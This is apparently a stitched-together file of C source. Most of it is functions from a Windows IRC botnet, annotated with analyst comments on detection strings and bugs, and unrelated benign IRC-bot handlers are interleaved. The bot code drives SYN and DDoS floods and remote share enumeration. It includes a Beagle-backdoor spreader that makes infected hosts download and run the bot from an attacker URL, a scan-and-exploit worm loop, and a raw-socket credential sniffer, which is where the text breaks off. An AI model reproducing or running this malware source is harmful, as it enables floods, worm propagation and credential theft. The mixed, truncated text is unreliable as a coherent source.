/*
 * Enumerates the file shares exposed by ServerName (NetShareEnum, info level
 * 502) and posts one line per share -- name, path, current use count and
 * whether its security descriptor validates -- to the IRC channel.  This is
 * host-reconnaissance functionality of the bot; the header line below
 * ("Share name:    Resource: ...") is a usable detection string for its
 * channel output.
 *
 * sock/chan/notice  IRC destination, passed straight through to irc_privmsg().
 * ServerName        ANSI host name; widened with AsWideString() for NetAPI.
 * Returns TRUE if the final NetShareEnum status is ERROR_SUCCESS, else FALSE.
 *
 * fNetShareEnum, fNetApiBufferFree, fIsValidSecurityDescriptor, AsWideString,
 * IsVSD and NasError are file-level names not shown here (presumably
 * dynamically resolved imports / helpers -- verify in the loader code).
 */
BOOL ListShares(SOCKET sock, char *chan, BOOL notice, char *ServerName)
{
	char buffer[IRCLINE];	// fixed-size line buffer; the sprintf in the loop is unbounded

	PSHARE_INFO_502 pBuf,p;
	NET_API_STATUS nStatus;
	LPWSTR wServerName = (LPWSTR)AsWideString(ServerName);	// lifetime/ownership of this wide copy is not visible here
	DWORD entriesread=0,totalread=0,resume=0;

	irc_privmsg(sock,chan,"Share name:    Resource:                Uses:  Desc:",notice);
 
	do {
		// prefmaxlen of -1 (MAX_PREFERRED_LENGTH) asks for every entry in one buffer;
		// `resume` carries the enumeration handle across ERROR_MORE_DATA iterations.
		nStatus = fNetShareEnum(wServerName, 502, (LPBYTE *) &pBuf, -1, &entriesread, &totalread, &resume);

		if(nStatus == ERROR_SUCCESS || nStatus == ERROR_MORE_DATA) {
			p = pBuf;
 
			for(unsigned int i=1;i <= entriesread;i++) {
				// %S formats the wide netname/path straight from the NetAPI buffer; nothing
				// bounds them against IRCLINE, so an over-long share path overflows `buffer`.
	            sprintf(buffer,"%-14S %-24S %-6u %-4s",p->shi502_netname, p->shi502_path, p->shi502_current_uses, IsVSD(fIsValidSecurityDescriptor(p->shi502_security_descriptor)));
				// extra trailing TRUE: irc_privmsg presumably has a defaulted/variadic last parameter
				irc_privmsg(sock,chan,buffer,notice,TRUE);

				p++;
			}

			fNetApiBufferFree(pBuf);	// NetAPI-owned buffer, released per chunk
		} else {
			sprintf(buffer,"[NET]: Share list error: %s <%ld>",NasError(nStatus),nStatus);
			irc_privmsg(sock,chan,buffer,notice);
		}
	} while (nStatus == ERROR_MORE_DATA);	

	if(nStatus != ERROR_SUCCESS)
		return FALSE;
	
	return TRUE;
}
/*
 * Thread entry for the bot's FINDFILE command: searches ffind.dirname for
 * ffind.filename via FindFile() (not shown) and reports the hit count to the
 * IRC channel and the log.  Runs on a thread created by the command
 * dispatcher; param points at an FFIND that the spawner reuses once gotinfo
 * has been set.
 *
 * param  FFIND* carrying sock/chan/notice/silent, filename, dirname and the
 *        thread-table slot (threadnum).
 * Never returns normally: ends with ExitThread(0).
 */
DWORD WINAPI FindFileThread(LPVOID param) 
{
	FFIND ffind = *((FFIND *)param);	// private copy of the request
	FFIND *ffinds = (FFIND *)param;
	ffinds->gotinfo = TRUE;	// signals the spawner that param may be reused

	char sendbuf[IRCLINE];
	unsigned int numfound = 0;

	// Strip one trailing backslash.  NOTE(review): for an empty dirname,
	// strlen()-1 wraps around and this indexes far outside the array.
	if (ffind.dirname[strlen(ffind.dirname)-1] == '\\')
		ffind.dirname[strlen(ffind.dirname)-1] = '\0';
	
	// _snprintf does not NUL-terminate when the output is truncated
	_snprintf(sendbuf,sizeof(sendbuf),"[FINDFILE]: Searching for file: %s.",ffind.filename);
	if (!ffind.silent) irc_privmsg(ffind.sock,ffind.chan,sendbuf,ffind.notice);

	numfound = FindFile(ffind.sock,ffind.chan,ffind.notice,ffind.filename,ffind.dirname,numfound);
	// unbounded sprintf (unlike the call above); %d is handed an unsigned int
	sprintf(sendbuf,"[FINDFILE]: Files found: %d.",numfound);
	if (!ffind.silent) irc_privmsg(ffind.sock,ffind.chan,sendbuf,ffind.notice);
	addlog(sendbuf);	// logged even when silent

	clearthread(ffind.threadnum);	// release the bot's thread-table slot

	ExitThread(0);
}
/*
 * Thread entry for the bot's "wonk" flood command (denial-of-service).  The
 * traffic itself is generated by SendPhatWonk() (not shown); this wrapper
 * only copies the request, runs the flood, reports the ports hit to IRC/log
 * and frees the thread slot.  The "-\x03\x34\2wonk\2\x03-" prefix (IRC
 * colour/bold control codes) is a usable signature for the bot's output.
 *
 * param  WONK* with ip, length and delay (strings, converted with atoi --
 *        non-numeric input silently becomes 0), IRC fields and threadnum.
 * Never returns normally: ends with ExitThread(0).
 */
DWORD WINAPI WonkThread(LPVOID param) 
{
	char sendbuf[IRCLINE];

	WONK wonk = *((WONK *)param);	// private copy of the request
	WONK *wonks = (WONK *)param;
	wonks->gotinfo = TRUE;	// signals the spawner that param may be reused

	// blocks for the whole flood; SendPhatWonk() returns a string of ports hit (unbounded sprintf)
	sprintf(sendbuf, "-\x03\x34\2wonk\2\x03- Done with flood, ports hit: %s", SendPhatWonk(finet_addr(wonk.ip), atoi(wonk.length), atoi(wonk.delay)));
	if (!wonk.silent) irc_privmsg(wonk.sock, wonk.chan, sendbuf, wonk.notice); 
	addlog(sendbuf);	// logged even when silent

	clearthread(wonk.threadnum);

	ExitThread(0); 
}
/*
 * Thread entry for the bot's "supersyn" flood command (denial-of-service).
 * SuperSyn() (not shown) does the sending and returns a throughput figure;
 * this wrapper copies the request, runs it, reports KB/sec to IRC/log and
 * frees the thread slot.  The "[SUPERSYN]: Done with flood" text is a usable
 * signature; the stray digits around it look like IRC colour codes whose
 * \x03 byte was lost in extraction -- confirm against the original file.
 *
 * param  SUPERSYN* with ip, port, length, IRC fields and threadnum.
 * Never returns normally: ends with ExitThread(0).
 */
DWORD WINAPI SuperSynThread(LPVOID param)
{
	char sendbuf[IRCLINE];

	SUPERSYN supersyn = *((SUPERSYN *)param);	// private copy of the request
	SUPERSYN *supersyns = (SUPERSYN *)param;
	supersyns->gotinfo = TRUE;	// signals the spawner that param may be reused

	// blocks for the whole flood
	sprintf(sendbuf, "4<<12[SUPERSYN]: Done with flood (%iKB/sec)4>>", SuperSyn(supersyn.ip, supersyn.port, supersyn.length));
	if (!supersyn.silent) irc_privmsg(supersyn.sock, supersyn.chan, sendbuf, supersyn.notice);
	addlog(sendbuf);	// logged even when silent

	clearthread(supersyn.threadnum);

	ExitThread(0);
}
/*
 * Thread entry for the bot's "skysyn" flood command (denial-of-service).
 * SkySyn() (not shown) does the sending and returns a throughput figure;
 * this wrapper copies the request, runs it, reports KB/sec to IRC/log and
 * frees the thread slot.  The "-\x03\x34\2skysyn\2\x03-" prefix (IRC
 * colour/bold control codes) is a usable signature for the bot's output.
 *
 * param  SKYSYN* with ip, port, length, IRC fields and threadnum.
 * Never returns normally: ends with ExitThread(0).
 */
DWORD WINAPI SkySynThread(LPVOID param) 
{
	char sendbuf[IRCLINE];

	SKYSYN skysyn = *((SKYSYN *)param);	// private copy of the request
	SKYSYN *skysyns = (SKYSYN *)param;
	skysyns->gotinfo = TRUE;	// signals the spawner that param may be reused

	// blocks for the whole flood
	sprintf(sendbuf, "-\x03\x34\2skysyn\2\x03- Done with flood (%iKB/sec)", SkySyn(skysyn.ip, skysyn.port, skysyn.length));
	if (!skysyn.silent) irc_privmsg(skysyn.sock, skysyn.chan, sendbuf, skysyn.notice); 
	addlog(sendbuf);	// logged even when silent

	clearthread(skysyn.threadnum);

	ExitThread(0); 
}
/*
 * Thread entry for the bot's SYN flood command (denial-of-service).
 * SynFlood() (not shown) does the sending and returns a throughput figure;
 * this wrapper copies the request, runs it, reports KB/sec to IRC/log and
 * frees the thread slot.  "[SYN]: Done with flood" is a usable signature
 * for the bot's channel output.
 *
 * param  SYNFLOOD* with ip, port, length, IRC fields and threadnum.
 * Never returns normally: ends with ExitThread(0).
 */
DWORD WINAPI SynFloodThread(LPVOID param) 
{
	char sendbuf[IRCLINE];

	SYNFLOOD synflood = *((SYNFLOOD *)param);	// private copy of the request
	SYNFLOOD *synfloods = (SYNFLOOD *)param;
	synfloods->gotinfo = TRUE;	// signals the spawner that param may be reused

	// blocks for the whole flood
	sprintf(sendbuf, "[SYN]: Done with flood (%iKB/sec).", SynFlood(synflood.ip, synflood.port, synflood.length));
	if (!synflood.silent) irc_privmsg(synflood.sock, synflood.chan, sendbuf, synflood.notice); 
	addlog(sendbuf);	// logged even when silent

	clearthread(synflood.threadnum);

	ExitThread(0); 
}
/*
 * Spreader routine (the "beagle1"/"beagle2" entries of the exploit[] table):
 * connects to exinfo.ip:exinfo.port, where a host already infected by the
 * Beagle/Bagle mass-mailer listens, sends one of two fixed authentication
 * blobs (BeagleAuth1/BeagleAuth2, file-level), and then hands that backdoor
 * an HTTP URL pointing at this bot's own executable (served on httpport) so
 * the victim fetches and runs it.  A success is reported to IRC/log and
 * counted in exploit[].stats.
 *
 * exinfo  by-value EXINFO: ip, port, command ("beagle1"/"beagle2"),
 *         sock/chan/notice/silent and the exploit[] index.
 * Returns TRUE only when the auth send, an 8-byte reply and the URL send all
 * went through.
 *
 * Detection: an outbound connection carrying a BeagleAuth blob followed by
 * an "http://<ip>:<port>/<exe name>" line; the "Exploiting IP:" channel line.
 */
BOOL Beagle(EXINFO exinfo)
{
	char *BeagleAuth, buffer[IRCLINE], botfile[MAX_PATH], fname[_MAX_FNAME], ext[_MAX_EXT];

	BOOL success = FALSE;

	WSADATA WSAData; 
	if (fWSAStartup(MAKEWORD(1,1), &WSAData)!=0) 	// Winsock 1.1, initialised per call
		return FALSE; 

	SOCKET sSock;
	if((sSock = fsocket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) != INVALID_SOCKET) {
		SOCKADDR_IN ssin;
		memset(&ssin, 0, sizeof(ssin));
		ssin.sin_family = AF_INET;
		ssin.sin_addr.s_addr = finet_addr(exinfo.ip);
		ssin.sin_port = fhtons(exinfo.port);

		if(fconnect(sSock, (LPSOCKADDR)&ssin, sizeof(ssin)) != SOCKET_ERROR) {
			// command string selects which of the two fixed blobs is used
			BeagleAuth = ((strcmp(exinfo.command, "beagle1") == 0)?(BeagleAuth1):(BeagleAuth2));
			// sizeof(BeagleAuth) is the size of a char*, not of the blob: only a
			// pointer-width number of bytes (4 on Win32) actually goes on the wire
			if(fsend(sSock, BeagleAuth, sizeof(BeagleAuth), 0) != SOCKET_ERROR) {
				if (frecv(sSock, buffer, 8, 0) != SOCKET_ERROR) {	// reply content is never inspected
					// basename+extension of this running executable becomes the URL path
					GetModuleFileName(0, botfile, sizeof(botfile));
					_splitpath(botfile, NULL, NULL, fname, ext);
					_snprintf(botfile, sizeof(botfile), "%s%s", fname, ext);
					// GetIP(): this bot's own address as seen on the connection; httpport is file-level
					_snprintf(buffer,sizeof(buffer),"http://%s:%s/%s", GetIP(sSock), httpport, botfile);

					// sends the entire IRCLINE buffer, i.e. stale stack bytes past the NUL as well
					if(fsend(sSock, buffer, sizeof(buffer), 0)) 
						success = TRUE;
				}
			}
		}
	}

	fclosesocket(sSock);	// also reached when sSock == INVALID_SOCKET
	fWSACleanup();

	if (success) {
		_snprintf(buffer, sizeof(buffer), "[%s]: Exploiting IP: %s.", exploit[exinfo.exploit].name, exinfo.ip);
		if (!exinfo.silent) irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice);
		addlog(buffer);
		exploit[exinfo.exploit].stats++;	// per-exploit hit counter shown by ListExploitStats
	}

	return (success);
}
/*
 * Stops bot threads of a given kind (killthreadid(), file-level, not shown)
 * and reports the outcome to IRC and the log.
 *
 * sock/chan/notice/silent  IRC destination; silent suppresses the channel
 *                          message, the log line is always written.
 * name/desc  prefix and human-readable kind used in the status line.
 * threadid   thread-type id handed to killthreadid().
 * thread     optional decimal thread number as text; NULL (or non-numeric,
 *            atoi -> 0) is passed on as 0, presumably meaning "every thread
 *            of that type" -- verify against killthreadid().
 */
void stopthread(SOCKET sock, char *chan, BOOL notice, BOOL silent, char *name, char *desc, int threadid, char *thread)
{
	char sendbuf[IRCLINE];
	int threadnum=0, i;

	if(thread)
		threadnum=atoi(thread);

	// killthreadid() appears to return the number of threads it stopped
	if ((i=killthreadid(threadid,threadnum)) > 0)
		sprintf(sendbuf,"%s: %s stopped. (%d thread(s) stopped.)", name, desc, i);
	else
		sprintf(sendbuf,"%s: No %s thread found.", name, desc);
	if (!silent) irc_privmsg(sock,chan,sendbuf,notice);
	addlog(sendbuf);

	return;
}
Archivo: prbot.c Proyecto: rfw/prbot
/*
 * Dispatches a channel PRIVMSG addressed to the bot ("<IRC_NICK>: <cmd> ...").
 * Only messages that begin with the bot's nick and arrive in a channel
 * (chan starts with '#') are acted on: "record " and "records " go to their
 * handlers, anything else gets a canned rebuke.  Always returns true.
 */
static bool
handle_privmsg(int fd, struct ircmsg_privmsg *msg)
{
	const char *prefix = IRC_NICK ": ";
	size_t prefix_len = strlen(prefix);

	/* Not addressed to us, or not a channel message: nothing to do. */
	if (strncmp(msg->text, prefix, prefix_len) != 0 || msg->chan[0] != '#')
		return true;

	char *args = msg->text + prefix_len;

	if (strncmp(args, "record ", 7) == 0)
		handle_cmd_record(fd, msg, args + 7);
	else if (strncmp(args, "records ", 8) == 0)
		handle_cmd_records(fd, msg, args + 8);
	else
		irc_privmsg(fd, msg->chan, "%s: shut the f**k up.", msg->name.nick);

	return true;
}
/*
 * Reports the address the scanner slot `threadnum` is currently probing, or
 * "Scan not active." when no SCAN_THREAD exists.  Reads advinfo[] (file-level
 * per-scan-thread table that AdvScanner/AdvPortScanner write) and prefixes
 * the line with mn_title (file-level).
 *
 * NOTE(review): threadnum indexes advinfo[] unchecked, and findthreadid()
 * only establishes that *some* scan thread exists, not that slot threadnum
 * belongs to one.
 */
void currentIP(SOCKET sock, char *chan, BOOL notice, int threadnum)
{
	char sendbuf[IRCLINE];

	if (findthreadid(SCAN_THREAD) > 0) {
		IN_ADDR in;
		in.s_addr = advinfo[threadnum].ip;	// network-order IPv4 address of the current target

		sprintf(sendbuf, "%s Current IP: %s",mn_title,finet_ntoa(in));
	} else 
		sprintf(sendbuf ,"%s Scan not active.",mn_title);

	irc_privmsg(sock, chan, sendbuf, notice);
	addlog(sendbuf);

	return;
}
/*
 * Thread entry for the bot's DDoS command.  DDOSAttack() (not shown) does
 * the sending, selected by ddos.type, and returns a throughput figure; this
 * wrapper copies the request, runs it, reports KB/sec to IRC/log and frees
 * the thread slot.  "[DDoS]: Done with flood" is a usable signature for the
 * bot's channel output.
 *
 * param  DDOST* with ip, port, type, length, IRC fields (note the field is
 *        named `socket` here, not `sock` as in the sibling structs) and
 *        threadnum.
 * Never returns normally: ends with ExitThread(0).
 */
DWORD WINAPI DDOSThread(LPVOID param) 
{
	char sendbuf[IRCLINE];

	DDOST ddos = *((DDOST *)param);	// private copy of the request
	DDOST *ddoss = (DDOST *)param;
	ddoss->gotinfo = TRUE;	// signals the spawner that param may be reused

	srand(GetTickCount());	// per-thread reseed of the C runtime PRNG

	// blocks for the whole flood
	sprintf(sendbuf, "[DDoS]: Done with flood (%iKB/sec).", DDOSAttack(ddos.ip, ddos.port, ddos.type, ddos.length));
	if (!ddos.silent) irc_privmsg(ddos.socket, ddos.chan, sendbuf, ddos.notice); 
	addlog(sendbuf);	// logged even when silent

	clearthread(ddos.threadnum);

	ExitThread(0); 
}
/*
 * Posts a one-line summary of the spreader's per-exploit hit counters
 * (exploit[].stats) plus the total and the uptime since `started`
 * (Uptime(), not shown) to IRC and the log.  The exploit[] table is walked
 * until an entry with port 0.
 *
 * NOTE(review): strncat's third argument is the space *remaining* in the
 * destination, not sizeof(buffer); as written the bound never takes effect,
 * so a long enough table overflows `buffer`.
 */
void ListExploitStats(SOCKET sock, char *chan, BOOL notice)
{
	char buffer[IRCLINE], buffer2[IRCLINE];

	int extotal = 0;
	sprintf(buffer, "%s",mn_title);	// mn_title: file-level message prefix
	for(int i=0; exploit[i].port != 0; i++) {
		extotal += exploit[i].stats;
		sprintf(buffer2,"[%s]: %d,",exploit[i].name,exploit[i].stats);
		strncat(buffer, buffer2, sizeof(buffer));	// see NOTE above: bound is not the free space
	}
	sprintf(buffer2, "Total: %d in %s", extotal, Uptime(started));
	strncat(buffer, buffer2, sizeof(buffer));

	irc_privmsg(sock, chan, buffer, notice);
	addlog(buffer);

	return;
}
/*
 * Greeting responder: when a PRIVMSG (after the leading nick is stripped)
 * matches one of helloinfo.trigger[], answer with a random helloinfo.reply[]
 * entry, subject to a cooldown of helloinfo.interval seconds since the last
 * reply and a probabilistic gate (helloinfo.odds).
 *
 * Returns 1 when the odds roll suppressed a reply that would otherwise have
 * been sent, 0 in every other case.
 */
int reply(info_t * in) {
   time_t now = time(NULL);

   /* Still inside the cooldown window: stay silent. */
   if (now < helloinfo.last + helloinfo.interval)
      return 0;

   if (in->cmd != cmd_privmsg)
      return 0;

   in->tail = skip_nick(in->tail, in->me);
   for (int t = 0; t < helloinfo.ntrigger; t++) {
      /* regex() returning 0 is treated as a match here. */
      if (regex(in->tail, helloinfo.trigger[t]) != 0)
         continue;
      /* Roll the dice before answering. */
      if (rrand(helloinfo.odds) > 0)
         return 1;
      irc_privmsg(to_sender(in), "%s",
         helloinfo.reply[rrand(helloinfo.nreply)]);
      helloinfo.last = now;
   }
   return 0;
}
/*
 * Thread entry for the bot's FTPTRANS command: opens an FTP session to
 * ftptrans.host through WinINet (global session handle `ih`) with the
 * supplied credentials, then either downloads remote->local (ftptrans.get)
 * or uploads local->remote, and reports the result to IRC/log.  The
 * credentials travel in the command struct in clear text.
 *
 * param  FTPTRANS* (host, username, password, remote, local, get flag, IRC
 *        fields, threadnum).
 * Never returns normally: ends with ExitThread(0).
 */
DWORD WINAPI FtpTransThread(LPVOID param)
{  
	char sendbuf[IRCLINE];

 	FTPTRANS ftptrans = *((FTPTRANS *)param);	// private copy of the request
    FTPTRANS *ftptranss = (FTPTRANS *)param;
	ftptranss->gotinfo = TRUE;	// signals the spawner that param may be reused
    
	HANDLE IntConn = fInternetConnect(ih, ftptrans.host, INTERNET_DEFAULT_FTP_PORT,
		ftptrans.username, ftptrans.password, INTERNET_SERVICE_FTP, INTERNET_FLAG_PASSIVE, 0);
	Sleep(1000);	// fixed delay; no visible reason for it

	if (IntConn) {
		if (ftptrans.get) {
			if (fFtpGetFile(IntConn, ftptrans.remote, ftptrans.local, FALSE, FILE_ATTRIBUTE_NORMAL, 
				FTP_TRANSFER_TYPE_UNKNOWN | INTERNET_FLAG_RELOAD, 0))
				_snprintf(sendbuf,sizeof(sendbuf),"[FTPTRANS]: Successful download of: %s/%s to: %s.",
					ftptrans.host, ftptrans.remote, ftptrans.local);
			else
				// PrintError()'s text is used as the *format* string (CWE-134): any '%' in the
				// system error message is interpreted as a conversion with no arguments supplied
				_snprintf(sendbuf,sizeof(sendbuf),PrintError("[FTPTRANS]:"));
		} else {
			if (fFtpPutFile(IntConn, ftptrans.local, ftptrans.remote, FTP_TRANSFER_TYPE_UNKNOWN, 0))	
				_snprintf(sendbuf,sizeof(sendbuf),"[FTPTRANS]: Successful upload of: %s to: %s/%s.",
					ftptrans.local, ftptrans.host, ftptrans.remote);
			else 
				// same non-literal format string pattern as above
				_snprintf(sendbuf,sizeof(sendbuf),PrintError("[FTPTRANS]:"));
		}
	} else
		_snprintf(sendbuf,sizeof(sendbuf),"[FTPTRANS]: Error: Failed to connect (invalid hostname or user account).");

	if (!ftptrans.silent) irc_privmsg(ftptrans.sock,ftptrans.chan,sendbuf,ftptrans.notice);
	addlog(sendbuf);	// logged even when silent
		
    fInternetCloseHandle(IntConn);	// also called with a NULL handle on the connect-failure path
	clearthread(ftptrans.threadnum);

	ExitThread(0);
}
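/*
 * Dispatches a channel PRIVMSG addressed to the bot ("<IRC_NICK>: <cmd> ...").
 *
 * Only messages that start with the full "<IRC_NICK>: " prefix and arrive in
 * a channel (chan begins with '#') are handled.  "help", "record " and
 * "records " are routed to their handlers (BeginsWith() and the handlers are
 * defined elsewhere in the file); anything else gets a canned rebuke.
 *
 * Returns the handler's result for a recognised command, true otherwise.
 */
static bool
handle_privmsg(int fd, struct ircmsg_privmsg *msg)
{
    static const char prefix[] = IRC_NICK ": ";
    const size_t prefix_len = sizeof(prefix) - 1;

    // Only handle messages directed at the bot.  The whole "<nick>: " prefix
    // must match, not just the nick: otherwise `cmd` below could point past
    // the terminator of a message that is shorter than the prefix.
    if (strncmp(msg->text, prefix, prefix_len) != 0)
        return true;

    // Only handle messages in a channel.
    if (msg->chan[0] != '#')
        return true;

    char *cmd = msg->text + prefix_len;

    // Arguments start right after the command word.
    if (BeginsWith(cmd, "help"))
        return handle_cmd_help(fd, msg, cmd + 4);
    if (BeginsWith(cmd, "record "))
        return handle_cmd_record(fd, msg, cmd + 7);
    if (BeginsWith(cmd, "records "))
        return handle_cmd_records(fd, msg, cmd + 8);

    irc_privmsg(fd, msg->chan, "%s: shut the f**k up.", msg->name.nick);
    return true;
}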
/*
 * "fortune" responder: on a PRIVMSG whose text (after the leading nick) is
 * the "fortune" command, send one random line from the fortune source back
 * to the sender, rate-limited to one per req_delay seconds.  While throttled,
 * NOTICE the requester how long is left, in the coarsest fitting unit.
 * Always returns 0.
 */
int reply(info_t * in) {
  char line[512];

  if (in->cmd != cmd_privmsg)
    return 0;

  in->tail = skip_nick(in->tail, in->me);
  /* tail_cmd() returning 0 means the command matched; randomline() fills line[]. */
  if (tail_cmd(&in->tail, "fortune") != 0)
    return 0;
  if (randomline(line, sizeof(line)) == NULL)
    return 0;

  if (time(NULL) - lasttime >= req_delay) {
    irc_privmsg(to_sender(in), "%s", line);
    lasttime = time(NULL);
    return 0;
  }

  /* Throttled: report the remaining wait. */
  int wait = req_delay - (time(NULL) - lasttime);
  if (wait > 3600)
    irc_notice(in->sender_nick, "Please wait %d hours.", wait / 3600);
  else if (wait > 60)
    irc_notice(in->sender_nick, "Please wait %d minutes.", wait / 60);
  else
    irc_notice(in->sender_nick, "Please wait %d seconds.", wait);
  return 0;
}
/*
 * Controller thread for the bot's "advanced" port/exploit scanner.  Records
 * the start address in advinfo[scan.threadnum] (file-level table), runs
 * CheckServers(), then spawns scan.threads AdvPortScanner worker sub-threads,
 * each registered in threads[] with this thread as parent.  Waits
 * scan.minutes (or, when 0, until advinfo[].info is cleared from outside),
 * announces completion with the sc_title prefix and frees the thread slot.
 *
 * CriticalSection (file-level) serialises the workers' IRC output; the first
 * scan thread to exist creates it and the last one destroys it.
 *
 * param  ADVSCAN* (ip, port, threads, minutes, random/exploit options, IRC
 *        fields, threadnum).  Workers get a pointer to this thread's private
 *        copy `scan` and copy it themselves.
 * Never returns normally on the success path: ends with ExitThread(0).
 */
DWORD WINAPI AdvScanner(LPVOID param)
{
	char buffer[LOGLINE]; 

	ADVSCAN scan = *((ADVSCAN *)param);	// private copy of the request
	ADVSCAN *scanp = (ADVSCAN *)param;
	scanp->gotinfo = TRUE;	// signals the spawner that param may be reused
	advinfo[scan.threadnum].ip = finet_addr(scan.ip);	// start address, read by currentIP()/workers

	CheckServers(scan);

	if (findthreadid(SCAN_THREAD) == 1) {	// we are the only scan thread: (re)create the lock
		DeleteCriticalSection(&CriticalSection); // just in case
		// NOTE(review): the Win32 docs do not define this call on a never-initialised section

		// 0x80000400: spin count 0x400; the high bit asks Windows to preallocate the event
		if (!InitializeCriticalSectionAndSpinCount(&CriticalSection, 0x80000400)) {
			sprintf(buffer,"Failed to initialize critical section.");
			if (!scan.silent) irc_privmsg(scan.sock,scan.chan,buffer,scan.notice);
			addlog(buffer);

			return 0;	// thread slot is NOT cleared on this path
		}
	}

	advinfo[scan.threadnum].info = TRUE;	// "scan running" flag the workers poll
	for (unsigned int i=1;i<=(scan.threads);i++) {
		scan.cthreadid = i;
		sprintf(buffer,"%s:%d, Scan thread: %d, Sub-thread: %d.",scan.ip, scan.port,scan.threadnum,scan.cthreadid); 
		scan.cthreadnum = addthread(buffer,SCAN_THREAD,NULL);
		threads[scan.cthreadnum].parent = scan.threadnum;
		// assignment inside the condition is intentional: the handle is stored and tested.
		// The worker copies *scan and sets cgotinfo; the wait below is meant to keep `scan`
		// stable until then.  NOTE(review): cgotinfo is never reset between iterations,
		// so after the first worker the wait is a no-op and later workers race the
		// next cthreadid/cthreadnum update.
		if (threads[scan.cthreadnum].tHandle = CreateThread(0,0,&AdvPortScanner,(LPVOID)&scan,0,0)) {
			while (scan.cgotinfo == FALSE)
				Sleep(30);
		} else {
			sprintf(buffer, "Failed to start worker thread, error: <%d>.", GetLastError());
			addlog(buffer);
		}

		Sleep(30);
	}

	if (scan.minutes != 0)
		Sleep(60000*scan.minutes);	// int multiply: overflows for minutes > 35791
	else 
		while (advinfo[scan.threadnum].info == TRUE) Sleep(2000);	// run until stopped externally

	IN_ADDR in;
	in.s_addr = advinfo[scan.threadnum].ip;
	sprintf(buffer,"%s Finished at %s:%d after %d minute(s) of scanning.", sc_title, finet_ntoa(in), scan.port, scan.minutes);
	if (!scan.silent) irc_privmsg(scan.sock,scan.chan,buffer,scan.notice);
	addlog(buffer);

	advinfo[scan.threadnum].info = FALSE;	// tells the workers to exit their loops
	Sleep(3000);	// grace period for the workers to notice

	if (findthreadid(SCAN_THREAD) == 1) 	// last scan thread standing tears the lock down
		DeleteCriticalSection(&CriticalSection);

	clearthread(scan.threadnum);

	ExitThread(0);
}
/*
 * Worker sub-thread of AdvScanner.  Repeatedly takes the next target address
 * (sequential AdvGetNextIP() or AdvGetNextIPRandom(), not shown), probes
 * scan.port with AdvPortOpen(), and either reports an open port to IRC/log
 * (scan.exploit == -1) or fills an EXINFO and invokes the selected exploit[]
 * entry against the host.  Loops while the parent's advinfo[].info flag
 * stays TRUE, sleeping 2 s between probes.
 *
 * param  ADVSCAN* -- the parent's private copy; this thread copies it and
 *        sets cgotinfo to tell the parent it may move on.
 * Never returns normally: ends with ExitThread(0).
 */
DWORD WINAPI AdvPortScanner(LPVOID param)
{
	IN_ADDR in;
	char logbuf[LOGLINE];

	ADVSCAN scan = *((ADVSCAN *)param);	// private copy of the parent's request
	ADVSCAN *scanp = (ADVSCAN *)param;
	scanp->cgotinfo = TRUE;	// parent polls this before changing its copy

	int threadnum=scan.cthreadnum;	// this worker's threads[] slot
	int threadid=scan.cthreadid;	// 1-based sub-thread number, for messages only

	srand(GetTickCount()); 	// per-thread reseed of the C runtime PRNG
	while (advinfo[threads[threadnum].parent].info) {	// parent clears .info to stop us
		DWORD dwIP;
		
		if (scan.random)
			dwIP = AdvGetNextIPRandom(scan.ip,threads[threadnum].parent);
		else
			dwIP = AdvGetNextIP(threads[threadnum].parent);
		in.s_addr = dwIP;

		sprintf(logbuf,"IP: %s:%d, Scan thread: %d, Sub-thread: %d.", 
			finet_ntoa(in), scan.port, threads[threadnum].parent, threadid); 
		// logbuf is passed as the *format* string (CWE-134) and nothing bounds it
		// against the size of threads[].name
		sprintf(threads[threadnum].name, logbuf);

		if (AdvPortOpen(dwIP, scan.port, scan.delay) == TRUE) {
			if (scan.exploit == -1) {	// plain port scan: just report
				EnterCriticalSection(&CriticalSection); 	// serialises output across workers

				sprintf(logbuf,"IP: %s, Port %d is open.",finet_ntoa(in),scan.port);
				if (!scan.silent) {
					if (scan.msgchan[0] != '\0')	// optional separate reporting channel
						irc_privmsg(scan.sock,scan.msgchan,logbuf,scan.notice, TRUE);
					else
						irc_privmsg(scan.sock,scan.chan,logbuf,scan.notice, TRUE);
				}
				addlog(logbuf);

				LeaveCriticalSection(&CriticalSection);
			} else {	// scan-and-exploit mode
				EXINFO exinfo;

				// Each of these uses the data as the *format* string with no length bound
				// (CWE-134 / overflow of the fixed EXINFO fields).  scan.chan/msgchan come
				// from the IRC command, so a '%' in a channel name drives sprintf here.
				sprintf(exinfo.ip, finet_ntoa(in));
				sprintf(exinfo.command, exploit[scan.exploit].command);
				if (scan.msgchan[0] != '\0')
					sprintf(exinfo.chan, scan.msgchan);
				else
					sprintf(exinfo.chan, scan.chan);
				exinfo.sock = scan.sock;
				exinfo.notice = scan.notice;
				exinfo.silent = scan.silent;
				exinfo.port = scan.port;
				exinfo.threadnum = threadnum;
				exinfo.exploit = scan.exploit;
				exploit[scan.exploit].exfunc(exinfo);	// e.g. Beagle(); blocks until it returns
			}
		}
		Sleep(2000);
	}
	clearthread(threadnum);

	ExitThread(0);
}
/*
 * Thread entry for the bot's PSNIFF command: a plaintext credential sniffer.
 * Opens a raw IP socket bound to the host's own address, switches it to
 * receive-all (promiscuous) mode with SIO_RCVALL, and checks the payload of
 * every TCP PSH|ACK segment against the keyword table pswords[] (file-level,
 * with a type index into ptype[]).  A hit is reported -- including the
 * payload -- to IRC, stdout and the log.
 *
 * Defensive notes: SIO_RCVALL on a raw socket needs administrative rights
 * and is a strong host-based indicator on its own; the captured data only
 * has value because the matched protocols are unencrypted.
 *
 * param  PSNIFF* (IRC fields, threadnum).
 * Never returns normally: every path ends with ExitThread(0).
 */
DWORD WINAPI SniffThread(LPVOID param) {

	char sendbuf[IRCLINE], rawdata[65535], *Packet;	// one full IP datagram per recv
	int i;
	DWORD dwRet, dwMode = 1;	// dwMode = 1 enables receive-all below

	PSNIFF sniff = *((PSNIFF *)param);	// private copy of the request
	PSNIFF *sniffs = (PSNIFF *)param;
	sniffs->gotinfo = TRUE;	// signals the spawner that param may be reused

	IPHEADER *ip;
	TCPHEADER *tcp;
	IN_ADDR sia, dia;

	SOCKET sniffsock;
	SOCKADDR_IN ssin;
	memset(&ssin, 0, sizeof(ssin));
	ssin.sin_family = AF_INET;
	ssin.sin_port = fhtons(0);
	ssin.sin_addr.s_addr = finet_addr(GetIP(sniff.sock));	// local address of the IRC connection

	if ((sniffsock = fsocket(AF_INET, SOCK_RAW, IPPROTO_IP)) == INVALID_SOCKET) {
		sprintf(sendbuf, "[PSNIFF]: Error: socket() failed, returned: <%d>.", fWSAGetLastError());
